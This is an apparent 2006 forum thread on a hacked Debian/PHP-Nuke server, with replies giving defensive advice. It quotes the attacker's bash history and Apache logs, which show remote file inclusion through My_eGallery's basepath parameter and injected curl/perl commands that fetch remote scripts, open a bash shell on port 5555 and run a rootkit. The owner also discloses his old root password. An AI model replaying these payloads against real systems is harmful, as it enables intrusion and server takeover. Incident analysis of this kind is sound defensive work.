My Home Server was hacked !!!

registered · Posted: Thu Jun 01, 2006 5:20 am

Hi,

My home server was hacked and I cant found the way used for hack it.

I inspect the root's .bash_history and found this ones:

Quote:

id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget [ Only registered users can see links on this board! Get registered or login! ]
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source [ Only registered users can see links on this board! Get registered or login! ] >
psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source [ Only registered users can see links on this board! Get registered or login! ] > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin

Any one could help me to find the vulnerability???

I use phpnuke 7.4 and my server is a debian stable.

I have the log files in the /var/log and i see that the file psyBNC2.3.2-4.tar.gz was created in may, 1.

Thank you

Site Admin Joined: Jun 04, 2004 Posts: 6432

Sounds like a needle in a very large haystack...

Posted: Thu Jun 01, 2006 7:14 am

Doubtful this was hacked because of PHP-Nuke unless you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user level access to the server (or was it root access?).

If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. Don't know how to do that, but I know it is possible in most *nix environments.

Posted: Fri Jun 02, 2006 12:45 am

montego wrote:

Doubtful this was hacked because of PHP-Nuke...

Gotta agree!

I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...

Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above... Wink

Posted: Fri Jun 02, 2006 12:47 am

Um... BTW, if it was me, I'd disable wget and lynx!!! That's just asking for trouble...

Posted: Fri Jun 02, 2006 12:58 am

LoL! This gets more interesting, the more I look at it!

As I hinted at above, 'they' used wget and lynx to upload the root kit[s] to your site... Then, away they went...

Make sure your server is recognizing the MIMEs mentioned above, such as:

Code:

AddType application/x-tar .tar


AddType application/x-gzip .gz .tgz


AddType application/x-tar .tgz

...and so forth, and so on!

Also, while you're at it, you might as well take care of RAR, since a LOT of 'script kiddies' are taking advantage of this vuln right now.

This applies to ALL Nuke web sites:

Code:

AddType application/x-rar-compressed .rar

This has snuck under the radar at MANY mass web hosts... mostly 'cause they all use the same canned software, like cPanel/WHM Rolling Eyes

Posted: Fri Jun 02, 2006 1:24 am

Heh! One more post and I'll stop spamming...

Some of you might find this interesting! I posted it the other day on another web site...

==============================

To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...

Create a plain text file containing the following code:

Code:

<?php print 'Oops!  If you can read this, your web server is vulnerable to attack!'; ?>

Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.

Then, run it in your browser by entering the URL in the browser's addy bar, i.e. [ Only registered users can see links on this board! Get registered or login! ]

If the page shows the message:

Quote:

Oops! If you can read this, your web server is vulnerable to attack!

...you should be alarmed!

If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...

==============================

Posted: Fri Jun 02, 2006 5:34 am

Dear kguske, montego, VinDSL,

kguske: yes, this is a needle in a very large haystack, for me! Smile

montego:

Quote:

you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server

yes! I have a general user in my server with the same username and pass that I was using in Nuke.

Quote:

This guy somehow got your root password?

Yes, the guy got my root password. My root pass was a very um commom pass. It was: DP83905AVQB . I suppose that he did a reverse conexion with a irq script and gain access to a apache shell script and do the comand "passwd" and change the root passwd. For me, he dont discovered my root passwd.

Quote:

If you do not have to access your server remotely (...), then you may want to disable remote user login

Yes, I have a keyboard and monitor and mouse connected. But, my server was in another place, then I need to connect to it by SSH. But, how I write above, I suppose that the guy did a reverse connection!!!! This is the problem: how I block reverse conection and how I block access to apche shell???

VinDSL

Quote:

I'd disable wget and lynx!!!

Yes, I will deinstall this two applications.

Quote:

Then, away they went...

Yes, I am sure that he went!

Quote:

Make sure your server is recognizing the MIMEs mentioned above, such as:

Code:

AddType application/x-tar .tar


AddType application/x-gzip .gz .tgz


AddType application/x-tar .tgz

(...)
This applies to ALL Nuke web sites:

Code:

AddType application/x-rar-compressed .rar

I am sorry, but what you are suggesting me?? Where I find/modify here? In http.conf? I am sorry, but my english is very poor!!!

I am very interested, to prevent and to learn, how the guy gain access to my shell???

I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not... Wink

Thank you very much

Posted: Fri Jun 02, 2006 6:22 am

Quote:

I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...

The only way to confirm this, I think, is through your Apache logs.

I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.

Posted: Thu Jun 08, 2006 12:53 pm

Hi Friends,

I found out what the kiddies did on my site:

here is the way:

Quote:

85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 Cool

"

The script that he had used is here: [ Only registered users can see links on this board! Get registered or login! ]

Now, what I do to prevent a new attack???

Could you help me?

I wolud like to continue using a gallery. Menalto is the option?

Thank you very much

Involved Joined: Jul 15, 2004 Posts: 252 Location: OKC, OK

I tried you test of vindsl.php.rar and sad to say it failed. So I added the mime types in my .htaccess file but it did not do anything. I checked on the apache site and could not find anything else to do, is there some trick?

I guess they may not have the mod_mine turned on.

Worker Joined: May 18, 2005 Posts: 119 Location: SVCDPlaza

On suse you can put the mime_magic module @ the APACHE_MODULES in the file:/etc/sysconfig/apache2 .
The MIME type goes in the file:/etc/mime.types file
Reboot apache and it will work .

Posted: Fri Jun 09, 2006 6:24 am

marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:

Code:




if ( !defined('MODULE_FILE') )


{


   die("You can't access this file directly...");


}

This would prevent these direct access attempts, however, I am not 100% if this would cause issues with the operations of the tool. It they wrote it to work within the nuke "structure", meaning, everything comes in through modules.php or admin.php.

Another possible "killer" to this if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, then you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.

Unfortunately, although nuke has had many wholes which have needed patching over the years, it is only as weak as its weakest link, and if you throw in a module that has "wholes" then immediately, your whole nuke site is vulnerable.

I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!